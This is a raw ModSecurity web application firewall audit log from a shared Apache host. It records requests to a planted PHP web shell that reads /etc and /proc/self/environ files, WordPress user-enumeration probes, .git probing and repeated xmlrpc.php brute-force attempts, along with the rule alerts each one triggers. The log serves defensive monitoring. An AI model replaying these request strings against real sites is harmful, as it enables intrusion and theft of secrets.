/admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/group.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.194.14.255 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --531b3425-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4570 Connection: close Content-Type: text/html; charset=UTF-8 --531b3425-H-- Message: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6UAMZRGs9Zs5Qd_koRxwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749980160871985 4306 (- - -) Stopwatch2: 1749980160871985 4306; combined=2180, p1=376, p2=1675, p3=36, p4=36, p5=57, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --531b3425-Z-- --b488b114-A-- [15/Jun/2025:15:06:03.748871 +0530] aE6UA-2-FeQLXg88DU1s7AAAAAY 18.204.89.56 53714 127.0.0.1 7081 --b488b114-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/apparmor HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.204.89.56 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --b488b114-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4573 Connection: close Content-Type: text/html; charset=UTF-8 --b488b114-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6UA-2-FeQLXg88DU1s7AAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apparmor"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6UA-2-FeQLXg88DU1s7AAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749980163744955 3965 (- - -) Stopwatch2: 1749980163744955 3965; combined=2037, p1=340, p2=1512, p3=33, p4=69, p5=83, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b488b114-Z-- --6bca5617-A-- [15/Jun/2025:15:08:09.059375 +0530] aE6Uf7p3Rl2d9qI7hkJuLwAAAAM 18.142.43.86 49896 127.0.0.1 7081 --6bca5617-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 18.142.43.86 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --6bca5617-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --6bca5617-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tandonamit.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6Uf7p3Rl2d9qI7hkJuLwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749980287685482 1373982 (- - -) Stopwatch2: 1749980287685482 1373982; combined=1914, p1=345, p2=1476, p3=0, p4=0, p5=92, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6bca5617-Z-- --f1c12a19-A-- [15/Jun/2025:15:09:00.072816 +0530] aE6UtE86SWGxMlRL5UU-pAAAAAU 52.200.54.136 40560 127.0.0.1 7081 --f1c12a19-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self&viewfile=//proc/self/environ HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.200.54.136 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f1c12a19-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2947 Connection: close Content-Type: text/html; charset=UTF-8 --f1c12a19-H-- Message: Warning. Matched phrase "proc/self/environ" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/environ found within ARGS:viewfile: /proc/self/environ"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/environ" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/environ found within ARGS:viewfile: /proc/self/environ"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6UtE86SWGxMlRL5UU-pAAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749980340068479 4390 (- - -) Stopwatch2: 1749980340068479 4390; combined=2376, p1=357, p2=1883, p3=38, p4=37, p5=61, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1c12a19-Z-- --4a718e41-A-- [15/Jun/2025:15:15:51.239637 +0530] aE6WTrp3Rl2d9qI7hkJu8wAAAAM 147.182.244.6 54008 127.0.0.1 7081 --4a718e41-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.sarvasya.com X-Real-IP: 147.182.244.6 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --4a718e41-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.sarvasya.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --4a718e41-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.sarvasya.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.sarvasya.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.sarvasya.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6WTrp3Rl2d9qI7hkJu8wAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarvasya.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749980750321263 918450 (- - -) Stopwatch2: 1749980750321263 918450; combined=1917, p1=332, p2=1469, p3=0, p4=0, p5=115, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a718e41-Z-- --76f28c54-A-- [15/Jun/2025:15:16:40.767051 +0530] aE6WfzS8xKUOR1xBR5bdaAAAAAM 80.85.245.37 53058 127.0.0.1 7081 --76f28c54-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: best-website-designs.com X-Real-IP: 80.85.245.37 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip --76f28c54-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --76f28c54-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aE6WfzS8xKUOR1xBR5bdaAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749980799866906 900266 (- - -) Stopwatch2: 1749980799866906 900266; combined=1843, p1=305, p2=1436, p3=0, p4=0, p5=101, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --76f28c54-Z-- --dbab371a-A-- [15/Jun/2025:15:17:27.889104 +0530] aE6Wr_M5htpueFTLtDWpxAAAAAQ 91.122.53.173 47426 127.0.0.1 7081 --dbab371a-B-- GET /.git/HEAD HTTP/1.0 Host: arrayz.com X-Real-IP: 91.122.53.173 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: identity User-Agent: Python-urllib/3.13 --dbab371a-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dbab371a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arrayz.com"] [uri "/.git/HEAD"] [unique_id "aE6Wr_M5htpueFTLtDWpxAAAAAQ"] Stopwatch: 1749980847886069 3089 (- - -) Stopwatch2: 1749980847886069 3089; combined=1819, p1=369, p2=1394, p3=0, p4=0, p5=56, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dbab371a-Z-- --234b071d-A-- [15/Jun/2025:15:18:51.004279 +0530] aE6XAjr2XEdSo0rTaLVj6AAAAAg 196.251.85.177 50274 127.0.0.1 7081 --234b071d-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --234b071d-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --234b071d-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.3econcepts.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6XAjr2XEdSo0rTaLVj6AAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749980930227720 776632 (- - -) Stopwatch2: 1749980930227720 776632; combined=2231, p1=431, p2=1711, p3=0, p4=0, p5=88, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --234b071d-Z-- --52605270-A-- [15/Jun/2025:15:20:44.626544 +0530] aE6Xc44sW1u-IrDl8WNE5AAAAAo 52.138.223.152 50102 127.0.0.1 7081 --52605270-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 52.138.223.152 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --52605270-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --52605270-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.3econcepts.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE6Xc44sW1u-IrDl8WNE5AAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749981043963979 662625 (- - -) Stopwatch2: 1749981043963979 662625; combined=1836, p1=342, p2=1389, p3=0, p4=0, p5=105, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52605270-Z-- --d199f950-A-- [15/Jun/2025:15:27:17.749690 +0530] aE6Y_A5W92IrFj5-L2B45wAAAA0 146.70.194.228 40632 127.0.0.1 7081 --d199f950-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: best-website-designs.com X-Real-IP: 146.70.194.228 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --d199f950-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 2 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --d199f950-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "best-website-designs.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6Y_A5W92IrFj5-L2B45wAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749981436839419 910344 (- - -) Stopwatch2: 1749981436839419 910344; combined=1866, p1=299, p2=1494, p3=0, p4=0, p5=73, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d199f950-Z-- --49a5c556-A-- [15/Jun/2025:15:27:24.122950 +0530] aE6ZA9-DHezsSmx4VonGcQAAAAI 146.70.194.228 52588 127.0.0.1 7081 --49a5c556-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 146.70.194.228 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --49a5c556-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --49a5c556-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.70.194.228 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.70.194.228 (+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE6ZA9-DHezsSmx4VonGcQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749981443191247 931796 (- - -) Stopwatch2: 1749981443191247 931796; combined=2244, p1=398, p2=1465, p3=35, p4=61, p5=178, sr=108, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49a5c556-Z-- --0be8b662-A-- [15/Jun/2025:15:28:24.709509 +0530] aE6ZPw5W92IrFj5-L2B5EAAAAA0 146.70.194.228 56314 127.0.0.1 7081 --0be8b662-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 146.70.194.228 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --0be8b662-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --0be8b662-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.70.194.228 (54+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.70.194.228 (54+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE6ZPw5W92IrFj5-L2B5EAAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749981503837848 871738 (- - -) Stopwatch2: 1749981503837848 871738; combined=2554, p1=395, p2=1740, p3=49, p4=74, p5=182, sr=123, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0be8b662-Z-- --60af7f5e-A-- [15/Jun/2025:15:29:23.984332 +0530] aE6Zex8Fyv2BjSAIyqL4BgAAAAE 146.70.194.228 33850 127.0.0.1 7081 --60af7f5e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 146.70.194.228 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 489 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --60af7f5e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --60af7f5e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.70.194.228 (57+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 146.70.194.228 (57+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE6Zex8Fyv2BjSAIyqL4BgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749981563081707 902690 (- - -) Stopwatch2: 1749981563081707 902690; combined=2237, p1=404, p2=1465, p3=40, p4=56, p5=170, 